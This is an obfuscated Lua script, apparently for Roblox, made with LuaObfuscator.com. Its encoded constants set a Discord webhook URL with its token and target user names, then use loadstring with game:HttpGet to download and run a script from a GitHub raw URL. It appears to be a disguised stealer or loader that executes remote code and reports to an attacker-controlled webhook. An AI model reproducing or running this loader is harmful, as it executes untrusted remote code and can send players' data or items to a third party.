--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v76=v5(v70,v19);v19=nil;return v76;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + ((98 + 522) -(555 + 64)))) ;return v71-(v71%(932 -(857 + 74))) ;else local v72=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v72 + v72))>=v72) and (1 + (877 -(282 + 595)))) or 0 ;end end local function v21()local v34=1637 -(1523 + 114) ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + 2 ;return (v37 * (1114 -858)) + v36 ;end local function v23()local v38=117 -(32 + 85) ;local v39;local v40;local v41;local v42;while true do if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + (0 -0) );v18=v18 + 1 + 3 ;v38=958 -(892 + 65) ;end if (v38==(2 -1)) then return (v42 * 16777216) + (v41 * (121138 -(55952 -(87 + 263)))) + (v40 * 256) + v39 ;end end end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(20 -((1433 -(630 + 793)) + 8))) then v48=v20(v45,21,119 -88 );v49=((v20(v45,474 -((1409 -993) + 26) )==(181 -(67 + 113))) and  -(1 + 0)) or 1 ;v43=7 -4 ;end if (v43==(0 + 0)) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==(955 -(802 + 150))) then if (v48==(0 -0)) then if (v47==(0 -(0 -0))) then return v49 * (0 + 0 + 0) ;else v48=998 -(915 + 82) ;v46=0 -(0 -0) ;end elseif (v48==(1193 + 854)) then return ((v47==(0 -0)) and (v49 * ((1188 -(1069 + 118))/((1747 -(760 + 987)) -0)))) or (v49 * NaN) ;end return v8(v49,v48-(2320 -1297) ) * (v46 + (v47/((3 -1)^(911 -(814 + 45))))) ;end if ((1 + 0)==v43) then v46=1 + (1913 -(1789 + 124)) ;v47=(v20(v45,1 -(766 -(745 + 21)) ,905 -(90 + 171 + 624) ) * ((2 + (0 -0))^(823 -(368 + 423)))) + v44 ;v43=6 -(15 -11) ;end end end local function v25(v50)local v51=0;local v52;local v53;while true do if (v51==(0 + 0)) then v52=nil;if  not v50 then local v93=0 + 0 ;while true do if (v93==(1055 -(87 + 968))) then v50=v23();if (v50==(0 -(0 -0))) then return "";end break;end end end v51=1 + 0 + 0 ;end if ((2 -1)==v51) then v52=v3(v16,v18,(v18 + v50) -(1414 -((984 -537) + 966)) );v18=v18 + v50 ;v51=5 -3 ;end if (v51==(1819 -(1703 + 114))) then v53={};for v77=702 -(376 + 325) , #v52 do v53[v77]=v2(v1(v3(v52,v77,v77)));end v51=4 -1 ;end if (3==v51) then return v6(v53);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==0) then v55=0;v56=nil;v54=1;end if ((3 + 0)==v54) then v61=nil;v62=nil;v54=1 + 3 ;end if (v54~=4) then else while true do if (v55==1) then local v97=0;local v98;while true do if (v97==(0 -0)) then v98=0;while true do if (v98==(66 -(30 + 35))) then v55=2;break;end if (v98==0) then v58=nil;v59=nil;v98=1;end end break;end end end if (v55~=0) then else local v99=0 + 0 ;local v100;while true do if ((1257 -(1043 + 214))~=v99) then else v100=0 -0 ;while true do if (v100~=(1213 -(323 + 889))) then else v55=2 -1 ;break;end if (v100==(580 -(361 + 219))) then v56=320 -(53 + 267) ;v57=nil;v100=1;end end break;end end end if (v55~=3) then else v62=nil;while true do local v103=0 + 0 ;while true do if (v103==(414 -(15 + 398))) then if (v56~=(984 -(18 + 964))) then else local v113=0 -0 ;local v114;while true do if (v113==0) then v114=0 + 0 ;while true do if (v114==1) then for v171=1,v23() do local v172=0 + 0 ;local v173;local v174;local v175;while true do if (1==v172) then v175=nil;while true do if (v173==(850 -(20 + 830))) then local v192=0 + 0 ;while true do if (v192==(126 -(116 + 10))) then v174=0;v175=nil;v192=1 + 0 ;end if (1==v192) then v173=1;break;end end end if (v173==(739 -(542 + 196))) then while true do if (v174==(0 -0)) then v175=v21();if (v20(v175,1,1)~=0) then else local v194=0;local v195;local v196;local v197;while true do if (v194==3) then if (v20(v196,1 + 2 ,3)==(1 + 0)) then v197[4]=v62[v197[4]];end v57[v171]=v197;break;end if (v194~=1) then else local v200=0;while true do if (v200~=1) then else v194=1 + 1 ;break;end if (v200==0) then v197={v22(),v22(),nil,nil};if (v195==0) then local v209=1551 -(1126 + 425) ;local v210;local v211;local v212;while true do if (v209==(405 -(118 + 287))) then v210=0 -0 ;v211=nil;v209=1122 -(118 + 1003) ;end if (v209==(2 -1)) then v212=nil;while true do if (v210==(377 -(142 + 235))) then v211=0 -0 ;v212=nil;v210=1 + 0 ;end if (v210==1) then while true do if ((977 -(553 + 424))==v211) then v212=0;while true do if (v212~=(0 -0)) then else v197[3]=v22();v197[4 + 0 ]=v22();break;end end break;end end break;end end break;end end elseif (v195==(1 + 0)) then v197[3]=v23();elseif (v195==(2 + 0)) then v197[2 + 1 ]=v23() -((2 + 0)^16) ;elseif (v195==3) then local v221=0 -0 ;local v222;while true do if (v221~=0) then else v222=0 -0 ;while true do if (v222~=(0 -0)) then else v197[3]=v23() -((1 + 1)^16) ;v197[4]=v22();break;end end break;end end end v200=4 -3 ;end end end if (0==v194) then local v201=0;while true do if (v201~=0) then else v195=v20(v175,755 -(239 + 514) ,2 + 1 );v196=v20(v175,4,6);v201=1330 -(797 + 532) ;end if (v201==1) then v194=1 + 0 ;break;end end end if (v194==(1 + 1)) then local v202=0;while true do if (v202==1) then v194=3;break;end if (v202==(0 -0)) then if (v20(v196,1,1)==(1203 -(373 + 829))) then v197[733 -(476 + 255) ]=v62[v197[2]];end if (v20(v196,1132 -(369 + 761) ,2)~=1) then else v197[2 + 1 ]=v62[v197[5 -2 ]];end v202=1 -0 ;end end end end end break;end end break;end end break;end if (v172~=(238 -(64 + 174))) then else v173=0 + 0 ;v174=nil;v172=1;end end end v56=3 -0 ;break;end if (v114~=(336 -(144 + 192))) then else local v170=0;while true do if (v170==(216 -(42 + 174))) then for v183=1 + 0 ,v61 do local v184=0;local v185;local v186;local v187;local v188;local v189;while true do if (v184==1) then v187=nil;v188=nil;v184=2 + 0 ;end if (v184~=2) then else v189=nil;while true do if (v185~=1) then else v188=nil;v189=nil;v185=2;end if (v185==2) then while true do if (0==v186) then local v198=0 + 0 ;while true do if (v198~=0) then else v187=0;v188=nil;v198=1505 -(363 + 1141) ;end if (v198~=(1581 -(1183 + 397))) then else v186=2 -1 ;break;end end end if (v186==1) then v189=nil;while true do if (v187~=0) then else local v203=0;local v204;local v205;while true do if (v203~=0) then else v204=0;v205=nil;v203=1 + 0 ;end if (v203==1) then while true do if (v204~=0) then else v205=0 + 0 ;while true do if (v205==1) then v187=1;break;end if (v205~=0) then else local v219=0;local v220;while true do if (v219~=(1975 -(1913 + 62))) then else v220=0;while true do if (v220==(0 + 0)) then local v223=0 -0 ;while true do if ((1933 -(565 + 1368))==v223) then v188=v21();v189=nil;v223=1;end if ((3 -2)==v223) then v220=1662 -(1477 + 184) ;break;end end end if (v220~=1) then else v205=1;break;end end break;end end end end break;end end break;end end end if ((1 -0)==v187) then if (v188==(1 + 0)) then v189=v21()~=0 ;elseif (v188==2) then v189=v24();elseif (v188==(859 -(564 + 292))) then v189=v25();end v62[v183]=v189;break;end end break;end end break;end if (v185==0) then v186=0 -0 ;v187=nil;v185=2 -1 ;end end break;end if (v184~=0) then else v185=0;v186=nil;v184=305 -(244 + 60) ;end end end v60[3]=v21();v170=1 + 0 ;end if (v170~=(477 -(41 + 435))) then else v114=1002 -(938 + 63) ;break;end end end end break;end end end if (v56==(3 + 0)) then local v115=1125 -(936 + 189) ;while true do if (v115~=0) then else local v159=0 + 0 ;while true do if (v159~=0) then else for v176=1,v23() do v58[v176-(1614 -(1565 + 48)) ]=v28();end return v60;end end end end end break;end if (v103==0) then local v108=0;while true do if (v108==(1 + 0)) then v103=1139 -(782 + 356) ;break;end if (v108==0) then if (v56~=(268 -(176 + 91))) then else local v160=0;local v161;local v162;while true do if (1==v160) then while true do if (v161==0) then v162=0 -0 ;while true do if (v162~=0) then else local v190=0;local v191;while true do if (0==v190) then v191=0 -0 ;while true do if (0==v191) then v60={v57,v58,nil,v59};v61=v23();v191=1;end if ((1 + 0)~=v191) then else v162=1;break;end end break;end end end if (v162~=(3 -2)) then else v62={};v56=6 -4 ;break;end end break;end end break;end if (v160==0) then v161=1018 -(697 + 321) ;v162=nil;v160=2 -1 ;end end end if ((0 -0)==v56) then local v163=0;local v164;while true do if (0==v163) then v164=0;while true do if (v164==0) then local v181=0 -0 ;local v182;while true do if (0==v181) then v182=0 + 0 ;while true do if (v182==0) then local v193=0;while true do if (v193~=1) then else v182=1 -0 ;break;end if (v193==(0 -0)) then v57={};v58={};v193=1228 -(322 + 905) ;end end end if (v182==1) then v164=612 -(602 + 9) ;break;end end break;end end end if (v164==1) then v59={};v56=1190 -(449 + 740) ;break;end end break;end end end v108=873 -(826 + 46) ;end end end end end break;end if ((949 -(245 + 702))==v55) then local v101=0 -0 ;local v102;while true do if (0==v101) then v102=0;while true do if (v102==(1 + 0)) then v55=1901 -(260 + 1638) ;break;end if (v102==(440 -(382 + 58))) then v60=nil;v61=nil;v102=3 -2 ;end end break;end end end end break;end if (1==v54) then v57=nil;v58=nil;v54=2 + 0 ;end if (v54~=2) then else v59=nil;v60=nil;v54=5 -2 ;end end end local function v29(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end if (v66==1) then v69=v63[3];return function(...)local v79=v67;local v80=v68;local v81=v69;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do v91=v79[v83];v92=v91[1];if (v92<=5) then if (v92<=2) then if (v92<=0) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92==1) then v89[v91[2]]=v91[3];else v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v65[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end elseif (v92<=3) then v89[v91[2]]=v65[v91[3]];elseif (v92==4) then local v125;local v126,v127;local v128;local v129;v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v65[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v65[v91[3]];v83=v83 + 1 ;v91=v79[v83];v129=v91[2];v128=v89[v91[3]];v89[v129 + 1 ]=v128;v89[v129]=v128[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v129=v91[2];v126,v127=v82(v89[v129](v13(v89,v129 + 1 ,v91[3])));v84=(v127 + v129) -1 ;v125=0;for v155=v129,v84 do local v156=0;while true do if (v156==0) then v125=v125 + 1 ;v89[v155]=v126[v125];break;end end end v83=v83 + 1 ;v91=v79[v83];v129=v91[2];v89[v129]=v89[v129](v13(v89,v129 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];else local v141=v91[2];local v142=v89[v91[3]];v89[v141 + 1 ]=v142;v89[v141]=v142[v91[4]];end elseif (v92<=8) then if (v92<=6) then local v111=0;local v112;while true do if (v111==0) then v112=v91[2];v89[v112]=v89[v112](v13(v89,v112 + 1 ,v84));break;end end elseif (v92==7) then v89[v91[2]][v91[3]]=v91[4];else v89[v91[2]]();end elseif (v92<=10) then if (v92==9) then local v148=0;local v149;local v150;local v151;local v152;while true do if (v148==0) then v149=v91[2];v150,v151=v82(v89[v149](v13(v89,v149 + 1 ,v91[3])));v148=1;end if (v148==2) then for v168=v149,v84 do local v169=0;while true do if (v169==0) then v152=v152 + 1 ;v89[v168]=v150[v152];break;end end end break;end if (v148==1) then v84=(v151 + v149) -1 ;v152=0;v148=2;end end else do return;end end elseif (v92==11) then v83=v91[3];else v89[v91[2]]=v91[3]~=0 ;end v83=v83 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3130312O363836333933393337353130342F65486343566B6E764D615842394847456A6B49755867396361425A6570666D653132592D393044306E6B555751693145656879626B357255786E795A79786C716A516341030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C79706865725363726970747303083O00557365724E616D6503073O006970696E5F703403093O00557365724E616D653200173O0012013O00013O00264O000E0001000200040B3O000E0001001203000100033O00300400010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000500016O000200056O00013O00024O00010001000100044O0016000100264O00010001000100040B3O00010001001203000100033O0030020001000A000B00122O000100033O00302O0001000C000B00124O00023O00044O000100012O000A3O00017O00",v9(),...);end
